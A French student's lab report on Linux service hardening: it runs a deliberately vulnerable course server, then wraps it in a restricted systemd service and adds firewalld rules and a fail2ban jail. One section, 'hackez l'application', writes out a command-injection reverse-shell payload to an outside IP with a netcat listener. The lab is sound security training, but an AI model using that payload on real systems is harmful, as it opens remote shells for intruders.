# Compte rendu TP Linux Tom Bernard

**🌞 Boom ça commence direct : je veux l'état initial du firewall**

```
[tom@localhost ~]$ sudo firewall-cmd --list-all
[sudo] password for tom:
public (active)
  target: default
  icmp-block-inversion: no
  interfaces: enp0s3 enp0s8
  sources:
  services: cockpit dhcpv6-client ssh
  ports:
  protocols:
  forward: yes
  masquerade: no
  forward-ports:
  source-ports:
  icmp-blocks:
  rich rules:
[tom@localhost ~]$
```

**🌞 Fichiers /etc/sudoers /etc/passwd /etc/group dans le dépôt de compte-rendu svp !**

```
[tom@localhost ~]$ sudo cat /etc/sudoers
## Sudoers allows particular users to run various commands as
## the root user, without needing the root password.
##
## Examples are provided at the bottom of the file for collections
## of related commands, which can then be delegated out to particular
## users or groups.
##
## This file must be edited with the 'visudo' command.

## Host Aliases
## Groups of machines. You may prefer to use hostnames (perhaps using
## wildcards for entire domains) or IP addresses instead.
# Host_Alias     FILESERVERS = fs1, fs2
# Host_Alias     MAILSERVERS = smtp, smtp2

## User Aliases
## These aren't often necessary, as you can use regular groups
## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname
## rather than USERALIAS
# User_Alias ADMINS = jsmith, mikem


## Command Aliases
## These are groups of related commands...

## Networking
# Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool

## Installation and management of software
# Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum

## Services
# Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig, /usr/bin/systemctl start, /usr/bin/systemctl stop, /usr/bin/systemctl reload, /usr/bin/systemctl restart, /usr/bin/systemctl status, /usr/bin/systemctl enable, /usr/bin/systemctl disable

## Updating the locate database
# Cmnd_Alias LOCATE = /usr/bin/updatedb

## Storage
# Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount

## Delegating permissions
# Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp

## Processes
# Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall

## Drivers
# Cmnd_Alias DRIVERS = /sbin/modprobe

# Defaults specification

#
# Refuse to run if unable to disable echo on the tty.
#
Defaults   !visiblepw

#
# Preserving HOME has security implications since many programs
# use it when searching for configuration files. Note that HOME
# is already set when the the env_reset option is enabled, so
# this option is only effective for configurations where either
# env_reset is disabled or HOME is present in the env_keep list.
#
Defaults    always_set_home
Defaults    match_group_by_gid

# Prior to version 1.8.15, groups listed in sudoers that were not
# found in the system group database were passed to the group
# plugin, if any. Starting with 1.8.15, only groups of the form
# %:group are resolved via the group plugin by default.
# We enable always_query_group_plugin to restore old behavior.
# Disable this option for new behavior.
Defaults    always_query_group_plugin

Defaults    env_reset
Defaults    env_keep =  "COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS"
Defaults    env_keep += "MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE"
Defaults    env_keep += "LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES"
Defaults    env_keep += "LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE"
Defaults    env_keep += "LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

#
# Adding HOME to env_keep may enable a user to run unrestricted
# commands via sudo.
#
# Defaults   env_keep += "HOME"

Defaults    secure_path = /sbin:/bin:/usr/sbin:/usr/bin

## Next comes the main part: which users can run what software on
## which machines (the sudoers file can be shared between multiple
## systems).
## Syntax:
##
##      user    MACHINE=COMMANDS
##
## The COMMANDS section may have other options added to it.
##
## Allow root to run any commands anywhere
root    ALL=(ALL)       ALL

## Allows members of the 'sys' group to run networking, software,
## service management apps and more.
# %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS

## Allows people in group wheel to run all commands
%wheel  ALL=(ALL)       ALL

## Same thing without a password
# %wheel        ALL=(ALL)       NOPASSWD: ALL

## Allows members of the users group to mount and unmount the
## cdrom as root
# %users  ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom

## Allows members of the users group to shutdown this system
# %users  localhost=/sbin/shutdown -h now

## Read drop-in files from /etc/sudoers.d (the # here does not mean a comment)
#includedir /etc/sudoers.d
[tom@localhost ~]$ sudo cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
tss:x:59:59:Account used for TPM access:/:/usr/sbin/nologin
sssd:x:998:996:User for sssd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/usr/share/empty.sshd:/usr/sbin/nologin
chrony:x:997:995:chrony system user:/var/lib/chrony:/sbin/nologin
tom:x:1000:1000:Bernard Tom:/home/tom:/bin/bash
[tom@localhost ~]$ sudo cat etc/group
cat: etc/group: No such file or directory
[tom@localhost ~]$ sudo cat /etc/group
root:x:0:
bin:x:1:
daemon:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mem:x:8:
kmem:x:9:
wheel:x:10:tom
cdrom:x:11:
mail:x:12:
man:x:15:
dialout:x:18:
floppy:x:19:
games:x:20:
tape:x:33:
video:x:39:
ftp:x:50:
lock:x:54:
audio:x:63:
users:x:100:
nobody:x:65534:
utmp:x:22:
utempter:x:35:
input:x:999:
kvm:x:36:
render:x:998:
systemd-journal:x:190:
systemd-coredump:x:997:
dbus:x:81:
ssh_keys:x:101:
tss:x:59:
sssd:x:996:
sshd:x:74:
chrony:x:995:
sgx:x:994:
tom:x:1000:
[tom@localhost ~]$
```
**🌞 Télécharger l'application depuis votre VM**

```
[tom@localhost efreiserveur]$ curl -O https://gitlab.com/it4lik/b3-csec-2024/-/raw/main/efrei_server?inline=false
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 39784  100 39784    0     0  64584      0 --:--:-- --:--:-- --:--:-- 64584
[tom@localhost efreiserveur]$ ls
efrei_server
[tom@localhost efreiserveur]$
```

**🌞 Lancer l'application efrei_server**
```
[tom@localhost efreiserveur]$ LISTEN_ADDRESS=192.168.56.109 ./efrei_server
Warning: You should consider setting the environment variable LOG_DIR. Defaults to /tmp.
Server started. Listening on ('192.168.56.109', 8888)...

```

**🌞* Prouvez que l'application écoute sur l'IP que vous avez spécifiée**

L'appli ecoute l'ip de la vm 192.168.56.109, et le port 8888, on autorise donc les connexion sur le port 8888 dans le firewall.
pour une raison qui m'est inconnu ss ne l'affiche pas mais quand je kill les process ca affichi l'ip utilisé donc on va se contenter de ca 

```
[tom@localhost efreiserveur]$ killall efrei_server
[tom@localhost efreiserveur]$ ps aux | grep efrei_server
tom         1376  0.0  0.0   3880  2048 pts/0    S+   11:59   0:00 grep --color=auto efrei_server
[1]+  Done                    LISTEN_ADDRESS=192.168.56.109 ./efrei_server
```

**🌞 Se connecter à l'application depuis votre PC**

```
C:\Users\PC>ncat 192.168.56.109 8888
Hello ! Tu veux des infos sur quoi ?
1) cpu
2) ram
3) disk
4) ls un dossier

Ton choix (1, 2, 3 ou 4) :
```
ouverture firewall


```
sudo firewall-cmd --add-port=8888/tcp --permanent
sudo firewall-cmd --reload

```


**🌞 Euh bah... hackez l'application !**

```

; sh -i >& /dev/tcp/192.168.1.11/8888 0>&1sh -i >& /dev/tcp/192.168.1.11/8888 0>&1

nc -lvnp 9001
```

**Créer un service efrei_server.service**

```
sudo nano /etc/systemd/system/efrei_server.service

[Unit]
Description=Super serveur EFREI

[Service]
ExecStart=/home/tom/efreiserveur/efrei_server
EnvironmentFile=home/tom/efreiserveur/efrei_server
Environment="LISTEN_ADDRESS=192.168.56.109"
Environment="PORT=8888"


(sortir du fichier)

[tom@localhost efreiserveur]$ sudo systemctl daemon-reload
```

**🌞 Exécuter la commande systemctl status efrei_server**


```
[tom@localhost efreiserveur]$ systemctl status efrei_server
○ efrei_server.service - efrei_server
     Loaded: loaded (/etc/systemd/system/efrei_server.service; static)
     Active: inactive (dead)

```


**🌞 Démarrer le service 🌞 Vérifier que le programme tourne correctement**

```
[tom@localhost efreiserveur]$ sudo systemctl status efrei_server
● efrei_server.service - Super serveur EFREI
     Loaded: loaded (/etc/systemd/system/efrei_server.service; static)
     Active: active (running) since Tue 2024-09-10 15:07:14 CEST; 43s ago
   Main PID: 4835 (efrei_server)
      Tasks: 2 (limit: 23172)
     Memory: 32.6M
        CPU: 97ms
     CGroup: /system.slice/efrei_server.service
             ├─4835 /home/tom/efreiserveur/efrei_server
             └─4836 /home/tom/efreiserveur/efrei_server

Sep 10 15:07:14 localhost.localdomain systemd[1]: Started Super serveur EFREI.
```

```
[tom@localhost efreiserveur]$ ss -tuln sport = :8888 | grep 192.168.56.109
tcp   LISTEN 0      100    192.168.56.109:8888      0.0.0.0:*
```

```
C:\Users\PC>ncat 192.168.56.109 8888
Ncat: Aucune connexion nÆa pu Ûtre Útablie car lÆordinateur cible lÆa expressÚment refusÚe. .

C:\Users\PC>ncat 192.168.56.109 8888
Hello ! Tu veux des infos sur quoi ?
1) cpu
2) ram
3) disk
4) ls un dossier

Ton choix (1, 2, 3 ou 4) :
```


**🌞 Ajoutez une clause dans le fichier efrei_server.service pour le restart automatique**

```
sudo nano /etc/systemd/system/efrei_server.service


[Unit]
Description=Super serveur EFREI

[Service]
ExecStart=/home/tom/efreiserveur/efrei_server
EnvironmentFile=home/tom/efreiserveur/efrei_server
Environment="LISTEN_ADDRESS=192.168.56.109"
Environment="PORT=8888"
Restart=always

(on exit)

```

**🌞 Testez que ça fonctionne**

on redemmare le service pour appliquer le nouveau redemmarage
```
[tom@localhost efreiserveur]$ sudo systemctl daemon-reload
[tom@localhost efreiserveur]$ sudo systemctl stop efrei_server
[tom@localhost efreiserveur]$ sudo systemctl start efrei_server
[tom@localhost efreiserveur]$ sudo systemctl status efrei_server
● efrei_server.service - Super serveur EFREI
     Loaded: loaded (/etc/systemd/system/efrei_server.service; static)
     Active: active (running) since Tue 2024-09-10 15:26:40 CEST; 3s ago
   Main PID: 4997 (efrei_server)
      Tasks: 2 (limit: 23172)
     Memory: 32.5M
        CPU: 90ms
     CGroup: /system.slice/efrei_server.service
             ├─4997 /home/tom/efreiserveur/efrei_server
             └─4998 /home/tom/efreiserveur/efrei_server

Sep 10 15:26:40 localhost.localdomain systemd[1]: Started Super serveur EFREI.
[tom@localhost efreiserveur]$

[tom@localhost efreiserveur]$ ps aux | grep efrei_server | grep -v grep
root        4997  0.0  0.0   2956  1936 ?        Ss   15:26   0:00 /home/tom/efreiserveur/efrei_server
root        4998  0.0  0.6  31244 25728 ?        S    15:26   0:00 /home/tom/efreiserveur/efrei_server

```

on stop le service et on verifie si ca marche et on admire !

```
[tom@localhost efreiserveur]$ sudo kill 4997 4998
[tom@localhost efreiserveur]$ ps aux | grep efrei_server | grep -v grep
root        5027  0.1  0.0   2956  1952 ?        Ss   15:29   0:00 /home/tom/efreiserveur/efrei_server
root        5028  0.0  0.6  31244 25728 ?        S    15:29   0:00 /home/tom/efreiserveur/efrei_server
[tom@localhost efreiserveur]$

```

**🌞 Créer un utilisateur applicatif**

```
[tom@localhost efreiserveur]$ sudo useradd -m -d /home/efreiapp -s /sbin/nologin userefrei
```
en créant un user ainsi, on sécurise un maximum. Avec cette commande on definit un répertoire repérable que l'on peu facilement reconnaitre et grace au "-s /sbin/nologin" on utilise un shell qui empeche la connexion.

**🌞 Modifier le service pour que le nouvel utilisateur lance efrei_server**

```
sudo nano /etc/systemd/system/efrei_server.service

[Unit]
Description=Super serveur EFREI

[Service]
ExecStart=/home/tom/efreiserveur/efrei_server
EnvironmentFile=home/tom/efreiserveur/efrei_server
Environment="LISTEN_ADDRESS=192.168.56.109"
Environment="PORT=8888"
Restart=always
User=userefrei
Group=userefrei
WorkingDirectory=/home/tom/efreiserveur

(on exit)

[tom@localhost efreiserveur]$ sudo systemctl daemon-reload
[tom@localhost efreiserveur]$ sudo systemctl start efrei_server
[tom@localhost efreiserveur]$ sudo systemctl status efrei_server
● efrei_server.service - Super serveur EFREI
     Loaded: loaded (/etc/systemd/system/efrei_server.service; static)
     Active: active (running) since Tue 2024-09-10 16:21:04 CEST; 2s ago
   Main PID: 5566 (efrei_server)
      Tasks: 2 (limit: 23172)
     Memory: 32.5M
        CPU: 89ms
     CGroup: /system.slice/efrei_server.service
             ├─5566 /home/tom/efreiserveur/efrei_server
             └─5567 /home/tom/efreiserveur/efrei_server

Sep 10 16:21:04 localhost.localdomain systemd[1]: Started Super serveur EFREI.


```

**🌞 Vérifier que le programme s'exécute bien sous l'identité de l'utilisateur**

```
[tom@localhost efreiserveur]$ ps aux | grep efrei_server | grep -v grep
userefr+    5566  0.0  0.0   2956  1960 ?        Ss   16:21   0:00 /home/tom/efreiserveur/efrei_server
userefr+    5567  0.0  0.6  31244 25728 ?        S    16:21   0:00 /home/tom/efreiserveur/efrei_server
[tom@localhost efreiserveur]$
```

**🌞 Choisir l'emplacement du fichier de logs**


```
sudo mkdir /var/log/efrei_logs

sudo nano /etc/systemd/system/efrei_server.service



[Unit]
Description=Super serveur EFREI

[Service]
ExecStart=/home/tom/efreiserveur/efrei_server
EnvironmentFile=home/tom/efreiserveur/efrei_server
Environment="LISTEN_ADDRESS=192.168.56.109"
Environment="PORT=8888"
Environment="LOG_DIR=/var/log/efrei_logs"
Restart=always
User=userefrei
Group=userefrei
WorkingDirectory=/home/tom/efreiserveur
```

Oh au faite, tu dis dans ton tp que l'appli créera un serveur.log, pour moi ce ne fut pas le cas j'ai du le créer sinon l'appli était pas contente, petite info au passage.

**🌞 Maîtriser les permissions du fichier de logs**

Changer le propriétaire du répertoire et définir les permissions les plus restrictives possibles :

```
[tom@localhost /]$sudo chown userefrei:userefrei /var/log/efrei_logs
[tom@localhost /]$sudo chmod 750 /var/log/efrei_logs
[tom@localhost /]$ ls -ld /var/log/efrei_logs
drwxr-x--- 2 userefrei userefrei 24 Sep 10 16:33 /var/log/efrei_logs
```

**🌞 Modifier le .service pour augmenter son niveau de sécurité**

Avant : 

```
[tom@localhost /]$ systemd-analyze security
UNIT                                 EXPOSURE PREDICATE HAPPY
NetworkManager.service                    7.8 EXPOSED   🙁
auditd.service                            8.9 EXPOSED   🙁
chronyd.service                           3.9 OK        🙂
crond.service                             9.6 UNSAFE    😨
dbus-broker.service                       8.7 EXPOSED   🙁
dm-event.service                          9.5 UNSAFE    😨
efrei_server.service                      9.2 UNSAFE    😨
emergency.service                         9.5 UNSAFE    😨
firewalld.service                         9.6 UNSAFE    😨
getty@tty1.service                        9.6 UNSAFE    😨
irqbalance.service                        8.9 EXPOSED   🙁
lvm2-lvmpolld.service                     9.5 UNSAFE    😨
rc-local.service                          9.6 UNSAFE    😨
rescue.service                            9.5 UNSAFE    😨
rsyslog.service                           5.8 MEDIUM    😐
sshd.service                              9.6 UNSAFE    😨
sssd-kcm.service                          7.7 EXPOSED   🙁
sssd.service                              8.3 EXPOSED   🙁
systemd-ask-password-console.service      9.4 UNSAFE    😨
systemd-ask-password-wall.service         9.4 UNSAFE    😨
systemd-initctl.service                   9.4 UNSAFE    😨
systemd-journald.service                  4.3 OK        🙂
systemd-logind.service                    2.8 OK        🙂
systemd-rfkill.service                    9.4 UNSAFE    😨
systemd-udevd.service                     6.9 MEDIUM    😐
user@1000.service                         9.4 UNSAFE    😨


[tom@localhost /]$ sudo nano /etc/systemd/system/efrei_server.service

[Unit]
Description=Super serveur EFREI

[Service]
ExecStart=/home/tom/efreiserveur/efrei_server
EnvironmentFile=home/tom/efreiserveur/efrei_server
Environment="LISTEN_ADDRESS=192.168.56.109"
Environment="PORT=8888"
Environment="LOG_DIR=/var/log/efrei_logs"
Restart=always
User=userefrei
Group=userefrei
WorkingDirectory=/home/tom/efreiserveur
```

Après : 

```
[tom@localhost /]$ sudo nano /etc/systemd/system/efrei_server.service

[Unit]
Description=Super serveur EFREI

[Service]
ExecStart=/home/tom/efreiserveur/efrei_server
EnvironmentFile=home/tom/efreiserveur/efrei_server
Environment="LISTEN_ADDRESS=192.168.56.109"
Environment="PORT=8888"
Environment="LOG_DIR=/var/log/efrei_logs"
Restart=always
User=userefrei
Group=userefrei
WorkingDirectory=/home/tom/efreiserveur

#sécurité

## Créer un répertoire temporaire privé pour le service
PrivateTmp=true                    
## Empêcher le chargement de modules du noyau
ProtectKernelModules=true          
## Empêcher l'accès aux paramètres du noyau
ProtectKernelTunables=true         
## Restreindre les modifications des groupes de contrôle (cgroups)
ProtectControlGroups=true          
## Empêcher la modification de l'horloge système
ProtectClock=true                  
## Empêcher la modification du nom d'hôte
ProtectHostname=true               
## Restreindre aux familles de protocoles réseau spécifiés
RestrictAddressFamilies=AF_INET 
## Empêcher l'accès aux périphériques matériels
PrivateDevices=true                


[tom@localhost /]$ sudo systemctl daemon-reload

```


**🌞 Configurer de façon robuste le firewall**


```

[tom@localhost ~]$ sudo firewall-cmd --zone=public --set-target=DROP --permanent
success
[tom@localhost ~]$ sudo firewall-cmd --zone=public --add-service=ssh --permanent
Warning: ALREADY_ENABLED: ssh
success
[tom@localhost ~]$ sudo firewall-cmd --zone=public --add-port=8888/tcp --permanent
Warning: ALREADY_ENABLED: 8888:tcp
success
[tom@localhost ~]$ sudo firewall-cmd --zone=public --add-icmp-block=echo-request --permanent
success
sudo firewall-cmd --zone=public --remove-forward --permanent
success
[tom@localhost ~]$ sudo firewall-cmd --reload
success
[tom@localhost ~]$ sudo firewall-cmd --list-all
public (active)
  target: DROP
  icmp-block-inversion: no
  interfaces: enp0s3 enp0s8
  sources:
  services: cockpit dhcpv6-client ssh
  ports: 8888/tcp 22/tcp
  protocols:
  forward: no
  masquerade: no
  forward-ports:
  source-ports:
  icmp-blocks: echo-request
  rich rules:
[tom@localhost ~]$ sudo firewall-cmd --runtime-to-permanent
success
[tom@localhost ~]$

```

**🌞 Prouver que la configuration est effective**


```
C:\Users\PC>ping 192.168.56.109

Envoi d’une requête 'Ping'  192.168.56.109 avec 32 octets de données :
Réponse de 192.168.56.109 : Impossible de joindre le réseau de destination.
Réponse de 192.168.56.109 : Impossible de joindre le réseau de destination.
Réponse de 192.168.56.109 : Impossible de joindre le réseau de destination.
Réponse de 192.168.56.109 : Impossible de joindre le réseau de destination.

Statistiques Ping pour 192.168.56.109:
    Paquets : envoyés = 4, reçus = 4, perdus = 0 (perte 0%),

C:\Users\PC>ssh tom@192.168.56.109
tom@192.168.56.109's password:
Last login: Wed Sep 11 10:51:18 2024 from 192.168.56.1

[tom@localhost ~]$ ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
^C
--- 192.168.1.1 ping statistics ---
17 packets transmitted, 0 received, 100% packet loss, time 16408ms

```


**🌞 Installer fail2ban**

```
[tom@localhost ~]$ sudo dnf install epel-release -y
[sudo] password for tom:
Last metadata expiration check: 0:26:21 ago on Wed Sep 11 10:51:27 2024.
Dependencies resolved.
========================================================================================================================
 Package                         Architecture              Version                      Repository                 Size
========================================================================================================================
Installing:
 epel-release                    noarch                    9-7.el9                      extras                     19 k

Transaction Summary
========================================================================================================================
Install  1 Package

Total download size: 19 k
Installed size: 26 k
Downloading Packages:
epel-release-9-7.el9.noarch.rpm                                                          75 kB/s |  19 kB     00:00
------------------------------------------------------------------------------------------------------------------------
Total                                                                                    40 kB/s |  19 kB     00:00
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                                                                1/1
  Installing       : epel-release-9-7.el9.noarch                                                                    1/1
  Running scriptlet: epel-release-9-7.el9.noarch                                                                    1/1
Many EPEL packages require the CodeReady Builder (CRB) repository.
It is recommended that you run /usr/bin/crb enable to enable the CRB repository.

  Verifying        : epel-release-9-7.el9.noarch                                                                    1/1

Installed:
  epel-release-9-7.el9.noarch

Complete!
[tom@localhost ~]$ sudo dnf install fail2ban -y
Extra Packages for Enterprise Linux 9 - x86_64                                          3.5 MB/s |  23 MB     00:06
Extra Packages for Enterprise Linux 9 openh264 (From Cisco) - x86_64                    3.5 kB/s | 2.5 kB     00:00
Dependencies resolved.
========================================================================================================================
 Package                                  Architecture       Version                        Repository             Size
========================================================================================================================
Installing:
 fail2ban                                 noarch             1.0.2-12.el9                   epel                  8.8 k
Installing dependencies:
 checkpolicy                              x86_64             3.6-1.el9                      appstream             352 k
 esmtp                                    x86_64             1.2-19.el9                     epel                   52 k
 fail2ban-firewalld                       noarch             1.0.2-12.el9                   epel                  8.9 k
 fail2ban-selinux                         noarch             1.0.2-12.el9                   epel                   29 k
 fail2ban-sendmail                        noarch             1.0.2-12.el9                   epel                   12 k
 fail2ban-server                          noarch             1.0.2-12.el9                   epel                  444 k
 libesmtp                                 x86_64             1.0.6-24.el9                   epel                   66 k
 liblockfile                              x86_64             1.14-10.el9.0.1                baseos                 27 k
 policycoreutils-python-utils             noarch             3.6-2.1.el9                    appstream              71 k
 python3-audit                            x86_64             3.1.2-2.el9                    appstream              82 k
 python3-distro                           noarch             1.5.0-7.el9                    appstream              36 k
 python3-libsemanage                      x86_64             3.6-1.el9                      appstream              79 k
 python3-policycoreutils                  noarch             3.6-2.1.el9                    appstream             2.0 M
 python3-setools                          x86_64             4.4.4-1.el9                    baseos                551 k
 python3-setuptools                       noarch             53.0.0-12.el9_4.1              baseos                838 k

Transaction Summary
========================================================================================================================
Install  16 Packages

Total download size: 4.6 M
Installed size: 16 M
Downloading Packages:
Extra Packages for Enterprise Linux 9 - 880% [==========================================================================================================================================================================================================================================================================================================================(1/16): fail2ban-1.0.2-12.el9.noarch.rpm                                                 59 kB/s | 8.8 kB     00:00
(2/16): fail2ban-firewalld-1.0.2-12.el9.noarch.rpm                                       50 kB/s | 8.9 kB     00:00
(3/16): fail2ban-selinux-1.0.2-12.el9.noarch.rpm                                        253 kB/s |  29 kB     00:00
(4/16): fail2ban-sendmail-1.0.2-12.el9.noarch.rpm                                       103 kB/s |  12 kB     00:00
(5/16): fail2ban-server-1.0.2-12.el9.noarch.rpm                                         1.5 MB/s | 444 kB     00:00
(6/16): python3-setuptools-53.0.0-12.el9_4.1.noarch.rpm                                 1.2 MB/s | 838 kB     00:00
(7/16): esmtp-1.2-19.el9.x86_64.rpm                                                      18 kB/s |  52 kB     00:02
(8/16): libesmtp-1.0.6-24.el9.x86_64.rpm                                                 25 kB/s |  66 kB     00:02
(9/16): python3-distro-1.5.0-7.el9.noarch.rpm                                           178 kB/s |  36 kB     00:00
(10/16): python3-setools-4.4.4-1.el9.x86_64.rpm                                         185 kB/s | 551 kB     00:02
(11/16): liblockfile-1.14-10.el9.0.1.x86_64.rpm                                         9.9 kB/s |  27 kB     00:02
(12/16): python3-audit-3.1.2-2.el9.x86_64.rpm                                            58 kB/s |  82 kB     00:01
(13/16): policycoreutils-python-utils-3.6-2.1.el9.noarch.rpm                            339 kB/s |  71 kB     00:00
(14/16): checkpolicy-3.6-1.el9.x86_64.rpm                                               126 kB/s | 352 kB     00:02
(15/16): python3-policycoreutils-3.6-2.1.el9.noarch.rpm                                 2.2 MB/s | 2.0 MB     00:00
(16/16): python3-libsemanage-3.6-1.el9.x86_64.rpm                                        29 kB/s |  79 kB     00:02
------------------------------------------------------------------------------------------------------------------------
Total                                                                                   502 kB/s | 4.6 MB     00:09
Extra Packages for Enterprise Linux 9 - x86_64                                          1.6 MB/s | 1.6 kB     00:00
Importing GPG key 0x3228467C:
 Userid     : "Fedora (epel9) <epel@fedoraproject.org>"
 Fingerprint: FF8A D134 4597 106E CE81 3B91 8A38 72BF 3228 467C
 From       : /etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL-9
Key imported successfully
Running transaction check
Transaction check succeeded.
Running transaction test
Transaction test succeeded.
Running transaction
  Preparing        :                                                                                                1/1
  Installing       : python3-setuptools-53.0.0-12.el9_4.1.noarch                                                   1/16
  Installing       : python3-setools-4.4.4-1.el9.x86_64                                                            2/16
  Installing       : python3-distro-1.5.0-7.el9.noarch                                                             3/16
  Installing       : python3-libsemanage-3.6-1.el9.x86_64                                                          4/16
  Installing       : python3-audit-3.1.2-2.el9.x86_64                                                              5/16
  Installing       : checkpolicy-3.6-1.el9.x86_64                                                                  6/16
  Installing       : python3-policycoreutils-3.6-2.1.el9.noarch                                                    7/16
  Installing       : policycoreutils-python-utils-3.6-2.1.el9.noarch                                               8/16
  Running scriptlet: fail2ban-selinux-1.0.2-12.el9.noarch                                                          9/16
  Installing       : fail2ban-selinux-1.0.2-12.el9.noarch                                                          9/16
  Running scriptlet: fail2ban-selinux-1.0.2-12.el9.noarch                                                          9/16
libsemanage.semanage_direct_install_info: Overriding fail2ban module at lower priority 100 with module at priority 200.

  Installing       : fail2ban-server-1.0.2-12.el9.noarch                                                          10/16
  Running scriptlet: fail2ban-server-1.0.2-12.el9.noarch                                                          10/16
  Installing       : fail2ban-firewalld-1.0.2-12.el9.noarch                                                       11/16
  Installing       : liblockfile-1.14-10.el9.0.1.x86_64                                                           12/16
  Installing       : libesmtp-1.0.6-24.el9.x86_64                                                                 13/16
  Installing       : esmtp-1.2-19.el9.x86_64                                                                      14/16
  Running scriptlet: esmtp-1.2-19.el9.x86_64                                                                      14/16
  Installing       : fail2ban-sendmail-1.0.2-12.el9.noarch                                                        15/16
  Installing       : fail2ban-1.0.2-12.el9.noarch                                                                 16/16
  Running scriptlet: fail2ban-selinux-1.0.2-12.el9.noarch                                                         16/16
  Running scriptlet: fail2ban-1.0.2-12.el9.noarch                                                                 16/16
  Verifying        : esmtp-1.2-19.el9.x86_64                                                                       1/16
  Verifying        : fail2ban-1.0.2-12.el9.noarch                                                                  2/16
  Verifying        : fail2ban-firewalld-1.0.2-12.el9.noarch                                                        3/16
  Verifying        : fail2ban-selinux-1.0.2-12.el9.noarch                                                          4/16
  Verifying        : fail2ban-sendmail-1.0.2-12.el9.noarch                                                         5/16
  Verifying        : fail2ban-server-1.0.2-12.el9.noarch                                                           6/16
  Verifying        : libesmtp-1.0.6-24.el9.x86_64                                                                  7/16
  Verifying        : python3-setuptools-53.0.0-12.el9_4.1.noarch                                                   8/16
  Verifying        : python3-setools-4.4.4-1.el9.x86_64                                                            9/16
  Verifying        : liblockfile-1.14-10.el9.0.1.x86_64                                                           10/16
  Verifying        : python3-distro-1.5.0-7.el9.noarch                                                            11/16
  Verifying        : checkpolicy-3.6-1.el9.x86_64                                                                 12/16
  Verifying        : python3-audit-3.1.2-2.el9.x86_64                                                             13/16
  Verifying        : python3-policycoreutils-3.6-2.1.el9.noarch                                                   14/16
  Verifying        : policycoreutils-python-utils-3.6-2.1.el9.noarch                                              15/16
  Verifying        : python3-libsemanage-3.6-1.el9.x86_64                                                         16/16

Installed:
  checkpolicy-3.6-1.el9.x86_64                          esmtp-1.2-19.el9.x86_64
  fail2ban-1.0.2-12.el9.noarch                          fail2ban-firewalld-1.0.2-12.el9.noarch
  fail2ban-selinux-1.0.2-12.el9.noarch                  fail2ban-sendmail-1.0.2-12.el9.noarch
  fail2ban-server-1.0.2-12.el9.noarch                   libesmtp-1.0.6-24.el9.x86_64
  liblockfile-1.14-10.el9.0.1.x86_64                    policycoreutils-python-utils-3.6-2.1.el9.noarch
  python3-audit-3.1.2-2.el9.x86_64                      python3-distro-1.5.0-7.el9.noarch
  python3-libsemanage-3.6-1.el9.x86_64                  python3-policycoreutils-3.6-2.1.el9.noarch
  python3-setools-4.4.4-1.el9.x86_64                    python3-setuptools-53.0.0-12.el9_4.1.noarch

Complete!
```

**🌞 Ajouter une jail fail2ban**





```
[tom@localhost efreiserveur]$ sudo nano /etc/fail2ban/jail.d/efrei_server.conf

[efrei-server]
enabled  = true
port     = 8888
filter   = efrei-server
logpath  = /var/log/efrei_logs
maxretry = 5
findtime = 10
bantime  = 3600
action   = firewallcmd-ipset[name=efrei-server, port=8888, protocol=tcp]

(exit le file)

[tom@localhost efreiserveur]$ sudo nano /etc/fail2ban/filter.d/efrei-server.conf

[Definition]
failregex = ^.*\s(?P<host>\d+\.\d+\.\d+\.\d+)\s.*$
ignoreregex =

(exit le file)

[tom@localhost efreiserveur]$ sudo systemctl restart fail2ban

```


**🌞 Vérifier que ça fonctionne**

petit script windows de spam de demande :
```
# Configuration
$ServerIP = "192.168.56.109"  
$ServerPort = "8888"          
$NumConnections = 10          
$SleepInterval = 1            

function Connect-ToServer {
    try {
        Invoke-WebRequest -Uri "http://${ServerIP}:${ServerPort}" -UseBasicP
    } catch {
        Write-Host "Erreur de connexion : $_"
    }
}

Write-Host "Début du test"

for ($i = 1; $i -le $NumConnections; $i++) {
    Connect-ToServer
    Write-Host "Connexion #$i effectuée..."
    Start-Sleep -Seconds $SleepInterval
}

Write-Host "c'est fini germain!"

```

on test : 

```
PS D:\EFREI cour\B3\programme cours Leo> .\testban.ps1
DÃ©but du test
